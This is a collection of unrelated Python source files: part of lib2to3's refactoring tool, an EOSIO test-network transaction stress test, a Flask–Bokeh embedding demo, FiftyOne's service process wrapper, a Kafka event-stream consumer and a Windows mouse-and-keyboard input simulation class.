post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline='') as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding)
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
p2p_stress.py
|
import copy
import random
import threading
import time
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds = [1, 5, 10, 30, 60, 100, 500]
sec = 10
maxthreads = 100
trList = []
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s = ""
for i in range(12):
s = s + random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo = "%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract = "eosio"
action = "issue"
data = "{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 " + CORE_SYMBOL + "\"}"
opts = "--permission eosio@active"
tr = node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads = self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (
acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target=self._transfer, args=(node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1 - t0 < delay):
time.sleep(delay - (t1 - t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
flask_bokeh.py
|
# Copyright (C) 21/1/20 RW Bunney
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
from flask import Flask, render_template
from bokeh.embed import server_document
from bokeh.layouts import column
from bokeh.models import ColumnDataSource, Slider
from bokeh.plotting import figure
from bokeh.server.server import Server
from bokeh.themes import Theme
from tornado.ioloop import IOLoop
from bokeh.sampledata.sea_surface_temperature import sea_surface_temperature
app = Flask(__name__)
def bkapp(doc):
df = sea_surface_temperature.copy()
source = ColumnDataSource(data=df)
plot = figure(x_axis_type='datetime', y_range=(0, 25), y_axis_label='Temperature (Celsius)',
title="Sea Surface Temperature at 43.18, -70.43")
plot.line('time', 'temperature', source=source)
def callback(attr, old, new):
if new == 0:
data = df
else:
data = df.rolling('{0}D'.format(new)).mean()
source.data = ColumnDataSource(data=data).data
slider = Slider(start=0, end=30, value=0, step=1, title="Smoothing by N Days")
slider.on_change('value', callback)
doc.add_root(column(slider, plot))
# doc.theme = Theme(filename="theme.yaml")
@app.route('/', methods=['GET'])
def bkapp_page():
script = server_document('http://localhost:5006/')
return render_template("embed.html", script=script, template="Flask")
def bk_worker():
# Can't pass num_procs > 1 in this configuration. If you need to run multiple
# processes, see e.g. flask_gunicorn_embed.py
server = Server({'/bkapp': bkapp}, io_loop=IOLoop(), allow_websocket_origin=["localhost:5006"])
server.start()
server.io_loop.start()
from threading import Thread
Thread(target=bk_worker).start()
if __name__ == '__main__':
print('Opening single process Flask app with embedded Bokeh application on http://localhost:8000/')
print()
print('Multiple connections may block the Bokeh app in this configuration!')
print('See "flask_gunicorn_embed.py" for one way to run multi-process')
app.run(port=8000)
|
main.py
|
"""
This script provides a consistent environment for services to run in. The basic
architecture is:
- parent process (python, ipython, etc.)
- this process, referred to as the "current" process (service/main.py)
- child process (the service)
- (optional): any child processes that the service creates
- clients (any other Python processes that are using this service) - see below
Some services that we spin up do not terminate on their own when their parent
process terminates, so they need to be killed explicitly. However, if the
parent process is a Python interpreter that is in the process of shutting down,
it cannot reliably kill its children. This script works around these issues by
detecting when the parent process exits, terminating its children, and only
then exiting itself.
Some services can also only have a single running instance per user. Notably,
only one instance of MongoDB can use a given data folder. To support this, when
invoked with the "--multi" option, this script allows additional "clients", i.e.
other Python processes using FiftyOne, to register themselves at any time. This
script will continue running in the background and keep the child process alive
until all registered clients, including the original parent process, have
exited.
| Copyright 2017-2021, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import argparse
import collections
import enum
import os
import signal
import subprocess
import sys
import threading
import traceback
import psutil
from fiftyone.core.service import Service
from fiftyone.service.ipc import IPCServer
lock = threading.Lock()
# global flag set when either the parent or child has terminated, to trigger
# shutdown of the current process (and children as necessary)
exiting = threading.Event()
class ExitMode(enum.IntEnum):
CHILD = 1
PARENT = 2
# set to indicate whether the child or parent exited first
exit_mode = None
def trigger_exit(mode):
"""Start the shutdown process."""
with lock:
global exit_mode
if exit_mode is None:
exit_mode = ExitMode(mode)
exiting.set()
def start_daemon_thread(target):
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
return thread
class ChildStreamMonitor(object):
"""Monitor for an output stream (stdout or stderr) of a child process.
This class serves multiple purposes:
- Collects output from the child process in a rolling buffer in the
background, and makes it available in a thread-safe manner.
- Causes the current process to exit when the child process closes the
stream (i.e. when the child process exits).
"""
def __init__(self, stream):
self.stream = stream
self.output_deque = collections.deque(maxlen=4)
thread = threading.Thread(target=self._run_monitor_thread)
thread.start()
def _run_monitor_thread(self):
"""Background task to collect output from the child process.
This is primarily necessary to keep the child process from hanging,
which would occur if it produces too much output that the current
process doesn't read, but the collected output is also made available
for convenience.
"""
while True:
chunk = self.stream.read(1024)
if not chunk:
# EOF - subprocess has exited, so trigger shutdown
trigger_exit(ExitMode.CHILD)
break
self.output_deque.appendleft(chunk)
def to_bytes(self):
"""Return output recently collected from the child process.
Currently, this is limited to the most recent 4KB.
"""
return b"".join(self.output_deque)
class ClientMonitor(object):
"""Monitor to keep track of all clients using this service.
This is only used for services that use multiple clients, e.g. the database
service. In addition to tracking the original parent process, other
processes can also request to be tracked by sending a message to this
process as a tuple: ("register", PID). trigger_exit(PARENT) is only called
after the original parent and all registered clients have shut down.
"""
# sentinel used to represent the original parent (which is tracked without
# its PID)
_PARENT = "parent"
def __init__(self):
"""Creates and starts a client monitor."""
# This has an internal lock, so it is reused for any operations that
# need to be synchronized
self.cond = threading.Condition()
# A set of clients (psutil.Process objects, which are hashable).
# As long as monitor_stdin() hasn't been called yet, we can assume the
# parent is still alive, and this can be changed later
self.clients = {ClientMonitor._PARENT}
# start background tasks
self.thread = start_daemon_thread(target=self._background_loop)
self.server = IPCServer.run_in_background(
on_message=self._handle_message
)
def notify_parent_exit(self):
"""Notifies the monitor that the original parent process has exited."""
self._notify_exit(ClientMonitor._PARENT)
def _background_loop(self):
"""Main background loop - waits for all clients to exit, then shuts down
the current process."""
with self.cond:
while self.clients:
self.cond.wait()
# all clients have exited now, so shut down
trigger_exit(ExitMode.PARENT)
def _background_wait(self, process):
try:
process.wait()
except psutil.Error:
pass
finally:
self._notify_exit(process)
def _notify_exit(self, process):
"""Notifies _background_loop that a client has exited."""
with self.cond:
self.clients.remove(process)
self.cond.notify_all()
def _handle_message(self, message):
"""Handles an incoming IPC message.
This currently supports registering and unregistering clients.
Args:
message (tuple): a 2-item tuple (command: str, argument)
Returns:
response to send to the client (True on success, Exception on failure)
"""
if not isinstance(message, tuple):
raise TypeError("Expected tuple, got " + str(type(message)))
command, arg = message
with lock:
if exiting.is_set():
raise RuntimeError("service is exiting, cannot connect")
if command == "register":
process = psutil.Process(int(arg))
with self.cond:
if process not in self.clients:
self.clients.add(process)
start_daemon_thread(
target=lambda: self._background_wait(process)
)
return True
elif command == "unregister":
process = psutil.Process(int(arg))
self._notify_exit(process)
return True
else:
raise ValueError("Unrecognized command: " + repr(command))
if __name__ != "__main__":
raise RuntimeError(
"This file is for internal use only and cannot be imported"
)
parser = argparse.ArgumentParser()
parser.add_argument(
"--51-service",
dest="service_name",
metavar="SERVICE_NAME",
type=str,
required=True,
)
parser.add_argument("--multi", action="store_true")
args, command = parser.parse_known_args()
if not command:
raise ValueError("No command given")
if command[0].startswith("--"):
raise ValueError("Unhandled service argument: %s" % command[0])
service_class = Service.find_subclass_by_name(args.service_name)
if args.multi:
client_monitor = ClientMonitor()
# ignore signals sent to the parent process - parent process termination is
# handled below, and necessary for cleaning up the child process
if hasattr(os, "setpgrp"):
# UNIX-only: prevent child process from receiving SIGINT/other signals
# from the parent process
os.setpgrp()
# also explicitly ignore SIGINT for good measure (note that this MUST be done
# before spinning up the child process, as the child inherits signal handlers)
signal.signal(signal.SIGINT, signal.SIG_IGN)
popen_kwargs = {}
if sys.platform.startswith("win"):
# CREATE_NEW_PROCESS_GROUP: disable ctrl-c
# https://docs.microsoft.com/en-us/windows/win32/procthread/process-creation-flags?redirectedfrom=MSDN
popen_kwargs["creationflags"] = 0x00000200
# use psutil's wrapper around subprocess.Popen for convenience (e.g. it makes
# finding the child's children significantly easier)
child = psutil.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**popen_kwargs,
)
child_stdout = ChildStreamMonitor(child.stdout)
child_stderr = ChildStreamMonitor(child.stderr)
def monitor_stdin():
"""Trigger shutdown when the parent process closes this process's stdin.
This should only occur when the parent process has exited.
"""
while len(sys.stdin.read(1024)):
pass
if args.multi:
client_monitor.notify_parent_exit()
else:
trigger_exit(ExitMode.PARENT)
def shutdown():
"""Kill subprocesses and wait for them to finish.
Also dumps output if the main child process fails to exit cleanly.
"""
# attempt to call cleanup() for the running service
try:
service_class.cleanup()
except Exception:
sys.stderr.write("Error in %s.cleanup():\n" % service_class.__name__)
traceback.print_exc(file=sys.stderr)
sys.stderr.flush()
# "yarn dev" doesn't pass SIGTERM to its children - to be safe, kill all
# subprocesses of the child process first
try:
# children() returns parent processes first - start with children
# instead to make killing "yarn dev" more reliable
for subchild in reversed(child.children(recursive=True)):
try:
subchild.terminate()
except psutil.NoSuchProcess:
# we may have already caused it to exit by killing its parent
pass
child.terminate()
except psutil.NoSuchProcess:
# child already exited
pass
child.wait()
if exit_mode == ExitMode.CHILD and child.returncode != 0:
sys.stdout.buffer.write(child_stdout.to_bytes())
sys.stdout.flush()
sys.stderr.write(
"Subprocess %r exited with error %i:\n"
% (command, child.returncode)
)
sys.stderr.buffer.write(child_stderr.to_bytes())
sys.stderr.flush()
stdin_thread = start_daemon_thread(target=monitor_stdin)
exiting.wait()
shutdown()
|
event_stream_consumer.py
|
import json
import logging
import os
from .event_stream_base import EventStreamBase
from kafka import KafkaConsumer, KafkaProducer
from kafka.vendor import six
from multiprocessing import Process, Queue, current_process, freeze_support, Pool
# idee
# import eventstream reader
# class inherince
# override for each message method, use var as string?
# -> goal of eventstream
#
# o1 here is function, do everything else (mulitple threads etc)
#
# o2 here is a class you can ran as you wish
#
# o3 (1+2) eventstream class has functions to do multithreads with the class
#
# consumer
# producer
# consumer producer
#
# -> event stream problem (handle multiple or just one each?)
# eventstreap processor process producer1, consumer2,
class EventStreamConsumer(EventStreamBase):
relation_type = ''
state = "raw"
topics = False
consumer = False
task_queue = Queue()
process_number = 4
log = "EventStreamConsumer " + str(id) + " "
def create_consumer(self):
logging.warning(self.log + "rt: %s" % self.relation_type)
if self.state == 'all':
self.topics = self.build_topic_list()
if isinstance(self.state, six.string_types):
self.state = [self.state]
if isinstance(self.relation_type, six.string_types):
self.relation_type = [self.relation_type]
if not self.topics:
self.topics = list()
for state in self.state:
for relation_type in self.relation_type:
self.topics.append(self.get_topic_name(state=state, relation_type=relation_type))
# self.topic_name = 'tweets'
logging.warning(self.log + "get consumer for topic: %s" % self.topics)
# consumer.topics()
self.consumer = KafkaConsumer(group_id=self.group_id,
bootstrap_servers=self.bootstrap_servers, api_version=self.api_version,
consumer_timeout_ms=self.consumer_timeout_ms)
for topic in self.topics:
self.consumer.subscribe(topic)
def consume(self):
logging.warning(self.log + "consume")
self.running = True
if not self.consumer:
self.create_consumer()
# Start worker processes
# for i in range(self.process_number):
# Process(target=self.on_message, args=(self.task_queue, )).start()
pool = Pool(self.process_number, self.worker, (self.task_queue,))
while self.running:
try:
for msg in self.consumer:
logging.warning(self.log + 'msg in consumer ')
# logging.warning('msg in consumer %s' % msg.value)
self.task_queue.put(json.loads(msg.value.decode('utf-8')))
except Exception as exc:
self.consumer.close()
logging.error(self.log + 'stream Consumer generated an exception: %s' % exc)
logging.warning(self.log + "Consumer closed")
break
if self.running:
return self.consume()
pool.close()
logging.warning(self.log + "Consumer shutdown")
def worker(self, queue):
logging.debug(self.log + "working %s" % os.getpid())
while True:
item = queue.get(True)
logging.debug(self.log + "got %s item" % os.getpid())
self.on_message(item)
def on_message(self, json_msg):
logging.warning(self.log + "on message")
def stop(self):
self.running = False
logging.warning(self.log + 'stop running consumer')
if __name__ == '__main__':
e = EventStreamConsumer(1)
e.consume()
|
BaseCtrl.py
|
from host.BaseComm import BaseComm
import os
import time
import pyautogui as pag
from ctypes import *
from win32api import GetSystemMetrics
from host.codemap import VirtualKeyCode
# https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook
import pyHook
import pythoncom
import threading
import time
dll = WinDLL("C:\\Windows\\System32\\user32.dll")
# x,y = pag.position() # 返回鼠标的坐标
# MC鼠标控制方法:迅速归中
# # 初始化屏幕大小(鼠标方法。。)
# _x , _y = pag.position()
# dll.mouse_event(0x0001 | 0x8000, 65536, 65536, 0, 0)
# time.sleep(0.01)
# display = pag.position()
# display = list(map(lambda x: x+1, display))
# print('屏幕大小', display)
# # pag.position(_x, _y)
# dll.mouse_event(0x0001 | 0x8000, int(65536 * _x / display[0]), int(65536 * _y / display[0]), 0, 0)
display = [GetSystemMetrics(0), GetSystemMetrics(1)]
print('屏幕大小', display)
# 加上小数修正!(?)
fix = [0.0, 0.0]
class BaseCtrl:
MOUSEEVENTF_MOVE = 0x0001
# 移动鼠标
MOUSEEVENTF_LEFTDOWN = 0x0002
# 模拟鼠标左键按下
MOUSEEVENTF_LEFTUP = 0x0004
# 模拟鼠标左键抬起
MOUSEEVENTF_RIGHTDOWN = 0x0008
# 模拟鼠标右键按下
MOUSEEVENTF_RIGHTUP = 0x0010
# 模拟鼠标右键抬起
MOUSEEVENTF_MIDDLEDOWN = 0x0020
# 模拟鼠标中键按下
MOUSEEVENTF_MIDDLEUP = 0x0040
# 模拟鼠标中键抬起
MOUSEEVENTF_ABSOLUTE = 0x8000
# 标示是否采用绝对坐标
MOUSEEVENTF_WHEEL = 0x0800
# 鼠标滚轮
WHEEL_DELTA = 120
# 一次滚动
KEYEVENTF_KEYUP = 0x0002
# 按键抬起
KEYEVENTF_EXTENDEDKEY = 0x0001
# 按键单击
ACTION_NONE = 0
ACTION_W = 1
ACTION_S = 2
ACTION_A = 3
ACTION_D = 4
ACTION_E = 5
ACTION_UP = 6
ACTION_DOWN = 7
def __init__(self):
pass
@staticmethod
# 传入数据:长度4 [x, y, key1, key2]
def parse(data: list):
if len(data) != 4:
return
@staticmethod
def move(x, y):
global fix
# 使用相对位置
# 范围:[1, 1, 屏幕宽度-1, 屏幕高度-1]
# x = int(x * 65535 / display[0])
# y = int(y * 65535 / display[1])
ix, iy = int(x), int(y)
fix[0] = fix[0] + (x - ix)
fix[1] = fix[1] + (y - iy)
# 暂时去掉小数修正。。。有点问题
if fix[0] >= 1:
fix[0] -= 1
# print('FIX X+1')
ix += 1
if fix[0] <= -1:
fix[0] += 1
ix -= 1
# print('FIX X-1')
if fix[1] >= 1:
fix[1] -= 1
iy += 1
# print('FIX Y+1')
if fix[1] <= -1:
fix[1] += 1
iy -= 1
# print('FIX Y-1')
# 加上调整函数x^3
ix = ix**3
iy = iy**3
ix = int(ix * 65536 / 3500 / 3500 / display[0])
iy = int(iy * 65536 / 3500 / 3500 / display[1])
# print('move:', x, y , '->', ix, iy)
# print('fix:', fix)
# dll.mouse_event(BaseCtrl.MOUSEEVENTF_ABSOLUTE | BaseCtrl.MOUSEEVENTF_MOVE, x, y, 0, 0)
dll.mouse_event(BaseCtrl.MOUSEEVENTF_MOVE, ix, iy, 0, 0)
@staticmethod
def left_down():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
@staticmethod
def left_up():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
@staticmethod
def right_down():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
@staticmethod
def right_up():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)
@staticmethod
def wheel_up():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_WHEEL, 0, 0, BaseCtrl.WHEEL_DELTA, 0)
@staticmethod
def wheel_down():
# 取反表示负数
dll.mouse_event(BaseCtrl.MOUSEEVENTF_WHEEL, 0, 0, ~BaseCtrl.WHEEL_DELTA, 0)
@staticmethod
def kbd_down(code: int):
dll.keybd_event(int(code), 0, 0, 0)
@staticmethod
def kbd_up(code: int):
dll.keybd_event(code, 0, BaseCtrl.KEYEVENTF_KEYUP, 0)
@staticmethod
def kbd_click(code: int):
dll.keybd_event(code, 0, BaseCtrl.KEYEVENTF_EXTENDEDKEY, 0)
# dll.keybd_event(int(code), 0, 0, 0)
# time.sleep(0.01)
# dll.keybd_event(code, 0, BaseCtrl.KEYEVENTF_KEYUP, 0)
@staticmethod
def action_forward_down():
BaseCtrl.kbd_down(VirtualKeyCode.W_key)
@staticmethod
def action_forward_up():
BaseCtrl.kbd_up(VirtualKeyCode.W_key)
